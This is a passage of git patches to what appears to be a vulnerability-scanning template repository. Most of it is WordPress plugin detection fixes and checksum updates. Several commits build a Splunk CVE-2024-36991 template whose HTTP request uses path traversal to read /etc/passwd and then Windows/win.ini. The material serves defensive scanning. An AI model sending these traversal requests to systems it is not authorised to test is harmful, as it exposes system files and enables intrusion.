490a00463044022021b97482d8580ae9b43c3b11c257aae3342215c736f345d25b9095cb589212c9022045ec8c82cd1bd783efdf66560071074ec38c247869aabe1436963bf11dd05071:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wp-statistics.yaml b/http/technologies/wordpress/plugins/wp-statistics.yaml index 69787d486b..5b690d96c0 100644 --- a/http/technologies/wordpress/plugins/wp-statistics.yaml +++ b/http/technologies/wordpress/plugins/wp-statistics.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a004730450220290b9e23706e6a64afe85b637db82c8b2d9a8094c1b1f3f38e2d37e7fe9184a4022100bff080f6171118a2e30e0bdfdde18b23a20c96d578350f4c5a70dd4be930e3e9:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wp-super-cache.yaml b/http/technologies/wordpress/plugins/wp-super-cache.yaml index 1729520b74..16c7d6cff5 100644 --- a/http/technologies/wordpress/plugins/wp-super-cache.yaml +++ b/http/technologies/wordpress/plugins/wp-super-cache.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a0046304402206d97023531e2d1f6ab7c3693bf66323c8167a47e123545d09e8d1e45c6a1a86202206562c69b3fe242ed1095edd36f6900b88acb5f249c2308ac6d2ae238d83d80c1:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wpcf7-recaptcha.yaml b/http/technologies/wordpress/plugins/wpcf7-recaptcha.yaml index cf02deacde..ab099f357e 100644 --- a/http/technologies/wordpress/plugins/wpcf7-recaptcha.yaml +++ b/http/technologies/wordpress/plugins/wpcf7-recaptcha.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a0047304502205bb947a37abf0235e445b1775e4d6fef46be781a7dba28a61aad5f6e80cf6392022100cae801ec5e29c1efcfc539d63258e65d07098db7ca2de4af6ceb572bb9a504e9:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wpcf7-redirect.yaml b/http/technologies/wordpress/plugins/wpcf7-redirect.yaml index 47eff78bc6..ad0b8f8fed 100644 --- a/http/technologies/wordpress/plugins/wpcf7-redirect.yaml +++ b/http/technologies/wordpress/plugins/wpcf7-redirect.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100e5c3eec92ac7cfdbefef936c0d95a0378c99682d5df58477b9e6985095a5ca660221009c7634c9abeb6b4da2172cbf24ef2a3d6c26894baf8a7bb3fbc9435a5fd3e722:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wpforms-lite.yaml b/http/technologies/wordpress/plugins/wpforms-lite.yaml index 540cd044f4..58e5e828bf 100644 --- a/http/technologies/wordpress/plugins/wpforms-lite.yaml +++ b/http/technologies/wordpress/plugins/wpforms-lite.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a0047304502200e67be24035856efd3d42000f9d261130b6466f38c62b29647d37844337d8530022100c668e4fb2fec1f72c8f853cee809e9dec4ce8a912c028ee6fb7cf773d8e7157a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wps-hide-login.yaml b/http/technologies/wordpress/plugins/wps-hide-login.yaml index 67f6cf7151..f943c7afeb 100644 --- a/http/technologies/wordpress/plugins/wps-hide-login.yaml +++ b/http/technologies/wordpress/plugins/wps-hide-login.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100ac42bd4327bf8873cedad6a5087c5a5b3edbefc9b0f72ccf75a3f1a6d1ae836f022011c3504564cdfbdd9050e9757376b9da866c55004379fca3a26b3b8b68ed8a6d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wpvivid-backuprestore.yaml b/http/technologies/wordpress/plugins/wpvivid-backuprestore.yaml index 964f37043e..062e5c85b4 100644 --- a/http/technologies/wordpress/plugins/wpvivid-backuprestore.yaml +++ b/http/technologies/wordpress/plugins/wpvivid-backuprestore.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100b40f63e2a31960f7157a3cc63fe2ff464b78d143a7283582145941d8294857450220551eb408b51a99671f4de17f59d8ea0e7ecdd7aea7e607fbca73ff01f1a9ca2a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/yith-woocommerce-wishlist.yaml b/http/technologies/wordpress/plugins/yith-woocommerce-wishlist.yaml index e72ef42ec7..6dcfdda117 100644 --- a/http/technologies/wordpress/plugins/yith-woocommerce-wishlist.yaml +++ b/http/technologies/wordpress/plugins/yith-woocommerce-wishlist.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022025eea9a9405123851d972dde43fbdc677d4d77a5fad5c8dc7aad22d3c1a920e0022100b6774bc1f224d40dddaad92d4f22b7f7865af0af2a7a6bc612636ab6475b72a6:922c64590222798bb761d5b6d8e72950 \ No newline at end of file From eb6ead1f36d5480d3b0dfdefe4d70b43c929072e Mon Sep 17 00:00:00 2001 From: Stefan Pietsch Date: Fri, 5 Jul 2024 07:42:30 +0200 Subject: [PATCH 0942/1841] Fixed Tomcat detection --- http/technologies/apache/tomcat-detect.yaml | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/http/technologies/apache/tomcat-detect.yaml b/http/technologies/apache/tomcat-detect.yaml index cc523899a7..d0f7766b8e 100644 --- a/http/technologies/apache/tomcat-detect.yaml +++ b/http/technologies/apache/tomcat-detect.yaml @@ -49,5 +49,5 @@ http: name: version group: 1 regex: - - '(?i)Apache Tomcat.*([0-9]\.[0-9]+\.[0-9]+)' -# digest: 4a0a00473045022100fca2e0dd8b0953b8a8837d98c56383f35619beaedd8dfc8f44fe4a3820a6960702206af63b29495b54a859bbd87226e420f128c28d0b95eaafd8ad0d71b2133529c7:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + - '(?i)Apache Tomcat.*\D([1-9]*[0-9]\.[0-9]+\.[0-9]+)' +# digest: 4a0a00473045022100fca2e0dd8b0953b8a8837d98c56383f35619beaedd8dfc8f44fe4a3820a6960702206af63b29495b54a859bbd87226e420f128c28d0b95eaafd8ad0d71b2133529c7:922c64590222798bb761d5b6d8e72950 From cb94e66e09befd588e27cc394291b96b62cf0c6a Mon Sep 17 00:00:00 2001 From: Tarunkant Gupta Date: Fri, 5 Jul 2024 12:57:01 +0530 Subject: [PATCH 0943/1841] Update springboot-configprops.yaml --- http/misconfiguration/springboot/springboot-configprops.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/http/misconfiguration/springboot/springboot-configprops.yaml b/http/misconfiguration/springboot/springboot-configprops.yaml index 61a8dc2b26..f7e24a0ed2 100644 --- a/http/misconfiguration/springboot/springboot-configprops.yaml +++ b/http/misconfiguration/springboot/springboot-configprops.yaml @@ -24,7 +24,7 @@ http: words: - "org.springframework.boot.actuate" - "beans" - - "contexts" + - "context" condition: and - type: status From 82936f405a2540aaa453f88e16cffc6e4bdefbf2 Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran Date: Fri, 5 Jul 2024 19:16:06 +0530 Subject: [PATCH 0944/1841] Create CVE-2024-36991.yaml --- http/cves/2024/CVE-2024-36991.yaml | 30 ++++++++++++++++++++++++++++++ 1 file changed, 30 insertions(+) create mode 100644 http/cves/2024/CVE-2024-36991.yaml diff --git a/http/cves/2024/CVE-2024-36991.yaml b/http/cves/2024/CVE-2024-36991.yaml new file mode 100644 index 0000000000..3d5100390c --- /dev/null +++ b/http/cves/2024/CVE-2024-36991.yaml @@ -0,0 +1,30 @@ +id: CVE-2024-36991 + +info: + name: Splunk Enterprise - Local File Inclusion + author: DhiyaneshDK + severity: high + description: | + In Splunk Enterprise on Windows versions below 9.2.2, 9.1.5, and 9.0.10, an attacker could perform a path traversal on the /modules/messaging/ endpoint in Splunk Enterprise on Windows. This vulnerability should only affect Splunk Enterprise on Windows. + reference: + - https://x.com/sheikhrishad0/status/1809210005125746880/photo/1 + metadata: + fofa-query: "Splunk Enterprise" + tags: cve,cve2024,splunk,lfi + +http: + - raw: + - | + GET /en-US/modules/messaging/C:../C:../C:../C:../C:../etc/passwd HTTP/1.1 + Host: {{Hostname}} + + matchers-condition: and + matchers: + - type: word + part: body + words: +#to be added - "" + + - type: status + status: + - 200 From 15020e6b3577ed078991ed661e8ee419a586fda9 Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran Date: Fri, 5 Jul 2024 21:07:18 +0530 Subject: [PATCH 0945/1841] fix template --- http/cves/2024/CVE-2024-36991.yaml | 11 +++++------ 1 file changed, 5 insertions(+), 6 deletions(-) diff --git a/http/cves/2024/CVE-2024-36991.yaml b/http/cves/2024/CVE-2024-36991.yaml index 3d5100390c..8bff3f15b1 100644 --- a/http/cves/2024/CVE-2024-36991.yaml +++ b/http/cves/2024/CVE-2024-36991.yaml @@ -18,13 +18,12 @@ http: GET /en-US/modules/messaging/C:../C:../C:../C:../C:../etc/passwd HTTP/1.1 Host: {{Hostname}} - matchers-condition: and + matchers-condition: or matchers: - type: word - part: body words: -#to be added - "" + - "root:" - - type: status - status: - - 200 + - type: word + words: + - "admin:" From 2561cf1d938965c703ffb3a97ed13c52ffda632e Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran Date: Fri, 5 Jul 2024 21:36:03 +0530 Subject: [PATCH 0946/1841] minor update --- http/cves/2024/CVE-2024-36991.yaml | 21 ++++++++++++--------- 1 file changed, 12 insertions(+), 9 deletions(-) diff --git a/http/cves/2024/CVE-2024-36991.yaml b/http/cves/2024/CVE-2024-36991.yaml index 8bff3f15b1..ae213176ba 100644 --- a/http/cves/2024/CVE-2024-36991.yaml +++ b/http/cves/2024/CVE-2024-36991.yaml @@ -8,22 +8,25 @@ info: In Splunk Enterprise on Windows versions below 9.2.2, 9.1.5, and 9.0.10, an attacker could perform a path traversal on the /modules/messaging/ endpoint in Splunk Enterprise on Windows. This vulnerability should only affect Splunk Enterprise on Windows. reference: - https://x.com/sheikhrishad0/status/1809210005125746880/photo/1 + - https://x.com/chybeta/status/1809249794122215557/photo/1 + - https://nvd.nist.gov/vuln/detail/CVE-2024-36991 metadata: - fofa-query: "Splunk Enterprise" + shodan-query: html:"Login | Splunk" + verified: true + max-request: 1 tags: cve,cve2024,splunk,lfi http: - raw: - | - GET /en-US/modules/messaging/C:../C:../C:../C:../C:../etc/passwd HTTP/1.1 - Host: {{Hostname}} + GET /en-US/modules/messaging/C:../C:../C:../C:../C:../C:../C:../C:../C:../C:../C:../Windows/win.ini HTTP/1.1 + Host: {{Hostname}} - matchers-condition: or matchers: - type: word + part: body words: - - "root:" - - - type: word - words: - - "admin:" + - "bit app support" + - "fonts" + - "extensions" + condition: and From 6f5881340453f9f80958842ac04ba903267e246d Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran Date: Fri, 5 Jul 2024 21:39:08 +0530 Subject: [PATCH 0947/1841] fix lint --- http/cves/2024/CVE-2024-36991.yaml | 6 +++--- 1 file changed, 3 insertions(+), 3 deletions(-) diff --git a/http/cves/2024/CVE-2024-36991.yaml b/http/cves/2024/CVE-2024-36991.yaml index ae213176ba..9885543f43 100644 --- a/http/cves/2024/CVE-2024-36991.yaml +++ b/http/cves/2024/CVE-2024-36991.yaml @@ -18,9 +18,9 @@ info: http: - raw: - - | - GET /en-US/modules/messaging/C:../C:../C:../C:../C:../C:../C:../C:../C:../C:../C:../Windows/win.ini HTTP/1.1 - Host: {{Hostname}} + - | + GET /en-US/modules/messaging/C:../C:../C:../C:../C:../C:../C:../C:../C:../C:../C:../Windows/win.ini HTTP/1.1 + Host: {{Hostname}} matchers: - type: word From 9c865d260627830e63bea5acff26940fd4364523 Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran Date: Fri, 5 Jul 2024 21:47:00 +0530 Subject: [PATCH 0948/1841] added flow --- http/cves/2024/CVE-2024-36991.yaml | 18 +++++++++++++++++- 1 file changed, 17 insertions(+), 1 deletion(-) diff --git a/http/cves/2024/CVE-2024-36991.yaml b/http/cves/2024/CVE-2024-36991.yaml index 9885543f43..2619d3af96 100644 --- a/http/cves/2024/CVE-2024-36991.yaml +++ b/http/cves/2024/CVE-2024-36991.yaml @@ -11,12 +11,28 @@ info: - https://x.com/chybeta/status/1809249794122215557/photo/1 - https://nvd.nist.gov/vuln/detail/CVE-2024-36991 metadata: - shodan-query: html:"Login | Splunk" verified: true max-request: 1 + shodan-query: html:"Login | Splunk" tags: cve,cve2024,splunk,lfi +flow: http(1) && http(2) + http: + - raw: + - | + GET /en-US/login HTTP/1.1 + Host: {{Hostname}} + + host-redirects: true + matchers: + - type: dsl + dsl: + - 'status_code == 200' + - 'contains(body, "Splunk Inc.")' + condition: and + internal: true + - raw: - | GET /en-US/modules/messaging/C:../C:../C:../C:../C:../C:../C:../C:../C:../C:../C:../Windows/win.ini HTTP/1.1 From 4c620c56dc8c1582e34e8505dd8c48f8e82b54c9 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Sat, 6 Jul 2024 00:18:43 +0000 Subject: [PATCH 0949/1841] Auto WordPress Plugins Update [Sat Jul 6 00:18:43 UTC 2024] :robot: --- helpers/wordpress/plugins/all-in-one-seo-pack.txt | 2 +- helpers/wordpress/plugins/backwpup.txt | 2 +- helpers/wordpress/plugins/optinmonster.txt | 2 +- 3 files changed, 3 insertions(+), 3 deletions(-) diff --git a/helpers/wordpress/plugins/all-in-one-seo-pack.txt b/helpers/wordpress/plugins/all-in-one-seo-pack.txt index d9167bb691..b3a44c11bc 100644 --- a/helpers/wordpress/plugins/all-in-one-seo-pack.txt +++ b/helpers/wordpress/plugins/all-in-one-seo-pack.txt @@ -1 +1 @@ -4.6.5 \ No newline at end of file +4.6.6 \ No newline at end of file diff --git a/helpers/wordpress/plugins/backwpup.txt b/helpers/wordpress/plugins/backwpup.txt index cd9b8f559e..8c7fafd365 100644 --- a/helpers/wordpress/plugins/backwpup.txt +++ b/helpers/wordpress/plugins/backwpup.txt @@ -1 +1 @@ -4.1.2 \ No newline at end of file +4.1.3 \ No newline at end of file diff --git a/helpers/wordpress/plugins/optinmonster.txt b/helpers/wordpress/plugins/optinmonster.txt index 38275d2df8..c39add5763 100644 --- a/helpers/wordpress/plugins/optinmonster.txt +++ b/helpers/wordpress/plugins/optinmonster.txt @@ -1 +1 @@ -2.16.3 \ No newline at end of file +2.16.4 \ No newline at end of file From 981b3a55267f9d762ecf381729b8d211acab0a3f Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran Date: Sat, 6 Jul 2024 06:32:56 +0530 Subject: [PATCH 0950/1841] minor update --- http/cves/2024/CVE-2024-25852.yaml | 11 ++++++----- 1 file changed, 6 insertions(+), 5 deletions(-) diff --git a/http/cves/2024/CVE-2024-25852.yaml b/http/cves/2024/CVE-2024-25852.yaml index fe344bfd34..69640bcdac 100644 --- a/http/cves/2024/CVE-2024-25852.yaml +++ b/http/cves/2024/CVE-2024-25852.yaml @@ -4,7 +4,9 @@ info: name: Linksys RE7000 - Command Injection author: securityforeveryone severity: high - description: RE7000 is a new dual-band AC1900 wireless extender with seamless roaming function launched by Linksys. + description: | + Linksys RE7000 v2.0.9, v2.0.11, and v2.0.15 have a command execution vulnerability in the "AccessControlList" parameter of the access control function point + impact: An attacker can use the vulnerability to obtain device administrator rights. reference: - https://nvd.nist.gov/vuln/detail/CVE-2024-25852 - https://github.com/ZackSecurity/VulnerReport/blob/cve/Linksys/1.md @@ -18,6 +20,7 @@ info: vendor: Linksys product: RE7000 tags: cve,cve2024,unauth,injection + variables: filename: "{{rand_base(5)}}" @@ -38,8 +41,6 @@ http: matchers: - type: dsl dsl: - - 'contains_all(body_1,"result","success")' - - 'contains_all(body_2,"PID","USER","VSZ","STAT","COMMAND")' - - 'status_code_1 == 200' - - 'status_code_2 == 200' + - 'contains_all(body_1,"result","success") && contains_all(body_2,"PID","USER","VSZ","STAT","COMMAND")' + - 'status_code_1 == 200 && status_code_2 == 200' condition: and From 1893fc27526074422dcae5c391af59c2cd4853fc Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Mon, 8 Jul 2024 00:20:39 +0000 Subject: [PATCH 0951/1841] Auto WordPress Plugins Update [Mon Jul 8 00:20:39 UTC 2024] :robot: --- helpers/wordpress/plugins/black-studio-tinymce-widget.txt | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/helpers/wordpress/plugins/black-studio-tinymce-widget.txt b/helpers/wordpress/plugins/black-studio-tinymce-widget.txt index fbafd6b600..e2bdf6e45a 100644 --- a/helpers/wordpress/plugins/black-studio-tinymce-widget.txt +++ b/helpers/wordpress/plugins/black-studio-tinymce-widget.txt @@ -1 +1 @@ -2.7.2 \ No newline at end of file +2.7.3 \ No newline at end of file From 44fc6800c28da4c8f0ec1f3f31ebec31bc1eebcc Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran Date: Mon, 8 Jul 2024 11:21:59 +0530 Subject: [PATCH 0952/1841] minor update --- http/cves/2024/CVE-2024-5084.yaml | 6 ++---- 1 file changed, 2 insertions(+), 4 deletions(-) diff --git a/http/cves/2024/CVE-2024-5084.yaml b/http/cves/2024/CVE-2024-5084.yaml index ccef4b6663..c1ed02cc3e 100644 --- a/http/cves/2024/CVE-2024-5084.yaml +++ b/http/cves/2024/CVE-2024-5084.yaml @@ -52,10 +52,8 @@ http: matchers: - type: dsl dsl: - - 'contains_all(body_2,"success","true","url")' - - 'status_code_2 == 200' - - 'contains(body_3,"{{md5(num)}}")' - - 'status_code_3 == 200' + - 'contains_all(body_2,"success","true","url") && status_code_2 == 200' + - 'contains(body_3,"{{md5(num)}}") && status_code_3 == 200' condition: and extractors: From 65cd4844d04c41a5573917d69e12f7a935d4c7df Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran Date: Mon, 8 Jul 2024 11:22:18 +0530 Subject: [PATCH 0953/1841] added tags --- http/cves/2024/CVE-2024-5084.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/http/cves/2024/CVE-2024-5084.yaml b/http/cves/2024/CVE-2024-5084.yaml index c1ed02cc3e..184c869cda 100644 --- a/http/cves/2024/CVE-2024-5084.yaml +++ b/http/cves/2024/CVE-2024-5084.yaml @@ -24,7 +24,7 @@ info: product: Hash Form framework: wordpress publicwww-query: "/wp-content/plugins/hash-form/" - tags: cve,cve2024,wp-plugin,wordpress,file-upload,rce + tags: cve,cve2024,wp-plugin,wordpress,file-upload,rce,intrusive variables: filename: "{{rand_base(5)}}" From 3841be192ecbfc75ac49f7514b1f4ccc656d60d9 Mon Sep 17 00:00:00 2001 From: "[PDBot]" Date: Mon, 8 Jul 2024 07:09:20 +0000 Subject: [PATCH 0954/1841] Auto Generated New Template Addition List [Mon Jul 8 07:09:20 UTC 2024] :robot: --- .new-additions | 1 + 1 file changed, 1 insertion(+) diff --git a/.new-additions b/.new-additions index a12e82131d..3fc08049a9 100644 --- a/.new-additions +++ b/.new-additions @@ -12,6 +12,7 @@ http/cves/2024/CVE-2024-29972.yaml http/cves/2024/CVE-2024-32709.yaml http/cves/2024/CVE-2024-33113.yaml http/cves/2024/CVE-2024-33605.yaml +http/cves/2024/CVE-2024-33610.yaml http/cves/2024/CVE-2024-34102.yaml http/cves/2024/CVE-2024-36401.yaml http/cves/2024/CVE-2024-37152.yaml From 09440f03745c0e0457a913a9642044f1dddae005 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Mon, 8 Jul 2024 07:09:26 +0000 Subject: [PATCH 0955/1841] Auto Generated Templates Checksum [Mon Jul 8 07:09:25 UTC 2024] :robot: --- templates-checksum.txt | 425 +++++++++++++++++++++-------------------- 1 file changed, 213 insertions(+), 212 deletions(-) diff --git a/templates-checksum.txt b/templates-checksum.txt index 175ccccd1c..44783eea74 100644 --- a/templates-checksum.txt +++ b/templates-checksum.txt @@ -739,20 +739,20 @@ helpers/wordpress/plugins/adminimize.txt:ec155403800c88db49630516a63f68500f17d61 helpers/wordpress/plugins/advanced-custom-fields.txt:a7fbd6d327737c06c4df75324d67f7a31797d931 helpers/wordpress/plugins/akismet.txt:fb52ada446f84acb5529ace8fe4f25e203a5dddb helpers/wordpress/plugins/all-404-redirect-to-homepage.txt:e5d05199b7d43b0bd203a9cf2e8e874dad4ff45f -helpers/wordpress/plugins/all-in-one-seo-pack.txt:4a74356d25940a094bf92b6722f74e38e3ad55ec -helpers/wordpress/plugins/all-in-one-wp-migration.txt:41d75a1151922be816d326fae3463dc4a05124b0 +helpers/wordpress/plugins/all-in-one-seo-pack.txt:a0d8efde6c39ba693651a975ac3b93c16ed3d566 +helpers/wordpress/plugins/all-in-one-wp-migration.txt:965640b9f3dffab46786b739a0e7857ba95ff2de helpers/wordpress/plugins/all-in-one-wp-security-and-firewall.txt:e935235d3647d6ff94e208a06b4173d6d3f01134 helpers/wordpress/plugins/amp.txt:c955a071223dbc4ae3893b0d1dc4db00dd77d91f helpers/wordpress/plugins/antispam-bee.txt:ce256ecfbb665c5366c1669a3e7c3a24c65a6fa2 -helpers/wordpress/plugins/astra-sites.txt:fdeeef76ef3c6bd7a322612266668f43721e50f7 +helpers/wordpress/plugins/astra-sites.txt:6d70c79393f5965a0a6bf1ce1c44267412d992e3 helpers/wordpress/plugins/astra-widgets.txt:386ef6797a9c4de50f240b16bd76bbeae35a5711 helpers/wordpress/plugins/autoptimize.txt:1889abba77b26fc1827431e5d46978a5e89769e6 -helpers/wordpress/plugins/backwpup.txt:36442478f1f952d62cb89e1b634d5937a7d2863f +helpers/wordpress/plugins/backwpup.txt:93cd63d42092dfdf799d4cecf593fe4d574f77dd helpers/wordpress/plugins/better-search-replace.txt:08d2e98e6754af941484848930ccbaddfefe13d6 helpers/wordpress/plugins/better-wp-security.txt:3fe0b3c91b9dd2a6f57c0d1e7ec7c05ac3858661 -helpers/wordpress/plugins/black-studio-tinymce-widget.txt:b74c052eec677c340bd7f99d94e1557d1f1d5e53 +helpers/wordpress/plugins/black-studio-tinymce-widget.txt:c3c414dd549c09cb265d8cf95aef8445bf875384 helpers/wordpress/plugins/breadcrumb-navxt.txt:2993934f31a10ddda5a7fb5e979600aa8bc7d69d -helpers/wordpress/plugins/breeze.txt:4e23fad538d40483dcecac95bf2c3e9e86f43a8c +helpers/wordpress/plugins/breeze.txt:4817cb4528a6e4857fb571db95197ba2033c4fc1 helpers/wordpress/plugins/broken-link-checker.txt:47ac56ccfa5b6db61c32cb48c2dda8cc64d242cb helpers/wordpress/plugins/chaty.txt:06752d2fb7fe65f618f40a9a33ebe4cc8e204317 helpers/wordpress/plugins/child-theme-configurator.txt:fbd969c78e9a6d04b7b8fc3a74ee2ee96b5fb3d8 @@ -809,7 +809,7 @@ helpers/wordpress/plugins/google-listings-and-ads.txt:f0500ea689c78156fdded5bae2 helpers/wordpress/plugins/google-site-kit.txt:451786e82a4757f98ef5d85c39adb09689db4c3f helpers/wordpress/plugins/google-sitemap-generator.txt:8219d4ef07eba68c05cb812b66a743661925aa25 helpers/wordpress/plugins/gtranslate.txt:16b08d6d2a65aa308add14852e0faea08001ef60 -helpers/wordpress/plugins/gutenberg.txt:7aa4f5f6af6e8c542120b221a810ac023bd89d3b +helpers/wordpress/plugins/gutenberg.txt:2aec4d7bf0ab32bb446c2b0aed18357efa20cd9f helpers/wordpress/plugins/happy-elementor-addons.txt:d33f1fbbd8e02405d75783dfb145509ee6f51975 helpers/wordpress/plugins/header-and-footer-scripts.txt:bf64dd8c92190417a38d834b0c92eee4be757761 helpers/wordpress/plugins/header-footer-code-manager.txt:42c9dca141f2cd50ab7fcfa673255d29eac1fe9d @@ -855,7 +855,7 @@ helpers/wordpress/plugins/ninja-forms.txt:ce69bc556a6db2eb8d56b75a008630d482b077 helpers/wordpress/plugins/ocean-extra.txt:dabb01b74fbe3c51012121a2802b2694c9968fc7 helpers/wordpress/plugins/official-facebook-pixel.txt:49f9230a0175e58b6964e60aa97809134e03c8ae helpers/wordpress/plugins/one-click-demo-import.txt:998d4ef3e7a6039ddbf0f888a2fd1c5243f7318b -helpers/wordpress/plugins/optinmonster.txt:ec386c8e47325b0d9e9d9c49e9bb46a21fcafbf1 +helpers/wordpress/plugins/optinmonster.txt:4ab9a0bf05b36d109d4eb7c7bcab71e82c8d07f2 helpers/wordpress/plugins/otter-blocks.txt:488784591515bd4cdaa016be4ec9b172dc4e7caf helpers/wordpress/plugins/password-protected.txt:b74c052eec677c340bd7f99d94e1557d1f1d5e53 helpers/wordpress/plugins/pdf-embedder.txt:7c48bf349bc02741cd6e5bf188ef8ecd52f2a60c @@ -902,7 +902,7 @@ helpers/wordpress/plugins/the-events-calendar.txt:44dbfaa714938949bc31889d586fe8 helpers/wordpress/plugins/themeisle-companion.txt:488784591515bd4cdaa016be4ec9b172dc4e7caf helpers/wordpress/plugins/tinymce-advanced.txt:93ab266c89e9dcb536484607a605b05e657be940 helpers/wordpress/plugins/translatepress-multilingual.txt:036622d5a32b0e5099f20d8cff7515dc042253aa -helpers/wordpress/plugins/ultimate-addons-for-gutenberg.txt:efeb47fd41d5443772275287ca2523cab8bc0139 +helpers/wordpress/plugins/ultimate-addons-for-gutenberg.txt:c9c181c9f96586d496156693f0242af36cb51b9a helpers/wordpress/plugins/under-construction-page.txt:17bb8bf9f231900aaec8e0d2788c3fa060ef1c5c helpers/wordpress/plugins/unyson.txt:08105b9ddd906ead00c6c2b76a45ffa54f0efc2d helpers/wordpress/plugins/updraftplus.txt:e091c0a7d31789d70b4711b992ca9a2e1e822cea @@ -3185,7 +3185,7 @@ http/cves/2023/CVE-2023-35078.yaml:4986f8899e309eabfe7de47ac607fc17bc6e2306 http/cves/2023/CVE-2023-35082.yaml:37ad71a404ca250f882e69f45503631e001653a2 http/cves/2023/CVE-2023-35156.yaml:72c2e061bd7264a8e88e39bed12978ba41608ad8 http/cves/2023/CVE-2023-35158.yaml:76d09942bb434d541e43eb224218c181af2a2f1f -http/cves/2023/CVE-2023-35160.yaml:617c0e5dc36eebc71db8c30fa818ae0aebe662bd +http/cves/2023/CVE-2023-35160.yaml:18c32e9c618ae99d50b0d2772e2196b575e2ba36 http/cves/2023/CVE-2023-35162.yaml:b3c53552dcd6e3ef5ee198684f10ef0eec25f283 http/cves/2023/CVE-2023-35813.yaml:071b2cdd7e888724f69f9772dafccd2fd315b143 http/cves/2023/CVE-2023-35843.yaml:fff3bc3dfbc836e0287b00ec362b9c5dda57a0a0 @@ -3455,6 +3455,7 @@ http/cves/2024/CVE-2024-33113.yaml:f4141a2a8bfa7dfe11f27cd2a19531a90de59223 http/cves/2024/CVE-2024-33288.yaml:021f1910a0468103d59167ac39fc9cf77f246bab http/cves/2024/CVE-2024-33575.yaml:bc3e1dc9d582e0bb3430a33791936484425fb962 http/cves/2024/CVE-2024-33605.yaml:073678cce93693a49cdbf61160717cff11e51f54 +http/cves/2024/CVE-2024-33610.yaml:68e2697350326fac7ae5a4d11c813a586affc694 http/cves/2024/CVE-2024-33724.yaml:fc5b67f9b84cdf5d6d592f2238c1fb0ef08592cc http/cves/2024/CVE-2024-3400.yaml:446beaf529f998b8b0c5957b75870f5198c21ff2 http/cves/2024/CVE-2024-34102.yaml:2152d70ae35f98d6968fad641af063bdd7b8f83b @@ -7255,228 +7256,228 @@ http/technologies/werkzeug-debugger-detect.yaml:af81a25156ac286ceb63a2599e8b8ddf http/technologies/wing-ftp-service-detect.yaml:02d0508b1caca874343eacbe1526d020160193cc http/technologies/wms-server-detect.yaml:a12dcf5c63bb483cadc2179824ea7bc811565a9d http/technologies/wondercms-detect.yaml:940ebbd50bb93299d72b2cc4712da95f4dcb24e8 -http/technologies/wordpress/plugins/ad-inserter.yaml:2271ec3dda6fe6239eb207abf753acf6004e6303 -http/technologies/wordpress/plugins/add-to-any.yaml:38060c2bbcf21f46edcb8d2b3e9dacf9a60be07c -http/technologies/wordpress/plugins/admin-menu-editor.yaml:c611e5db9315e7299a5467f885a5fee0c9a78e2a +http/technologies/wordpress/plugins/ad-inserter.yaml:bb2b6a2cefcec61917f7c15ee96e80a750f1d703 +http/technologies/wordpress/plugins/add-to-any.yaml:09e1ee7958521db8ab328e41fc0b2e15a735e7d3 +http/technologies/wordpress/plugins/admin-menu-editor.yaml:df8964abf44d766617dbeeba4395f6f901a1b142 http/technologies/wordpress/plugins/adminimize.yaml:fe9261de252e3a80da843e6bd6b356825bb37611 -http/technologies/wordpress/plugins/advanced-custom-fields.yaml:64615791edcbf699fbdaf77d76b447aece4f8d1d -http/technologies/wordpress/plugins/akismet.yaml:5e601025cc174359b17c906bdbceb771ed484bc4 +http/technologies/wordpress/plugins/advanced-custom-fields.yaml:44a3c2e8c28b0a7c380fff8b194f80bc0b85209d +http/technologies/wordpress/plugins/akismet.yaml:a7c535fa20e8248b7d4b8c3dcd004f82ce282861 http/technologies/wordpress/plugins/all-404-redirect-to-homepage.yaml:cd265a5fec513a57ee120b7713fc294eae0d745b -http/technologies/wordpress/plugins/all-in-one-seo-pack.yaml:7cf0219bc17e533a6fb9605de083299f8c110a6d -http/technologies/wordpress/plugins/all-in-one-wp-migration.yaml:cbf464e28b85e0b355a230de385cc285c9d4190f 